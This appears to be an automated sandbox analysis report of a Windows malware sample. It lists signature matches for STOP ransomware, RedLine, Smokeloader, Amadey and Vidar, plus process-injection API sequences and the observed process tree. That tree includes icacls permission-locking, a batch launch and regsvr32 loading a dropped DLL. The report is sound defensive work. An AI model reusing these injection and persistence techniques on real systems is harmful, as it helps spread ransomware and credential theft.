Source: 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000026.00000002.2803018648.00000000008E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.4498779959.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000002.2123714329.00000000008EA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2370773420.0000000002121000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000002B.00000002.2816735837.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.2123563075.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000023.00000000.2656436321.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000000.00000002.2123436882.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2370645961.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2558233012.0000000002263000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.2644967918.0000000002231000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000026.00000002.2802808021.0000000000881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000023.00000002.2658515111.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: 958B.exe PID: 3636, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 4708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 5664, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 3292, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 3848, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 3648, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 4416, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 958B.exe PID: 5788, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: build2.exe PID: 5428, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe, type: DROPPED	Matched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 02418EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 00428C81 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 02420160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 004547A0 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 0042F7C0 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 00428520 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 00406740 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: String function: 00454E50 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: String function: 0062E3EB appears 36 times
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: String function: 005A3125 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: String function: 005A3535 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: String function: 005A53B7 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: String function: 005A228E appears 49 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403383 LdrLoadDll,GetModuleHandleA,NtEnumerateKey,	0_2_00403383
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015BC
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00401590 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401590
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015CB
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00403383 LdrLoadDll,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	5_2_00403383
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040159B
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015B0
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	7_2_023F0110

Source: A9E0.dll.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 5DA4.exe.2.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 496211 bytes, 2 files, at 0x2c +A "tlatest.bat" +A "treelatest.exe", ID 2579, number 1, 17 datablocks, 0x1503 compression
Source: treelatest.exe.45.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 453340 bytes, 2 files, at 0x2c +A "callcustomerpro.exe" +A "thoseintroductory.exe", ID 4248, number 1, 23 datablocks, 0x1503 compression

Source: file.exe, 00000000.00000000.2032516982.000000000059E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegolfstrikator.exe> vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamegolfstrikator.exe> vs file.exe

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 958B.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: F3CC.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vusretg.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: afsretg.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 958B.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: A9E0.dll.2.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT size: 0x48 address: 0x0

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\vusretg

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@75/177@41/21

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

8_2_00411900

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_00404E94 _lopen,_calloc,_malloc,_calloc,_fputwc,GetTickCount,GetNamedPipeInfo,LoadResource,GetNumberFormatW,PeekNamedPipe,

7_2_00404E94

Source: C:\Users\user\AppData\Local\Temp\5DA4.exe

Process created: C:\Windows\System32\cmd.exe cmd /c tlatest.bat

Source: file.exe	ReversingLabs: Detection: 39%
Source: file.exe	Virustotal: Detection: 38%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vusretg C:\Users\user\AppData\Roaming\vusretg
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe C:\Users\user\AppData\Local\Temp\958B.exe
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe C:\Users\user\AppData\Local\Temp\958B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A079.exe C:\Users\user\AppData\Local\Temp\A079.exe
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A9E0.dll
Source: unknown	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\A9E0.dll
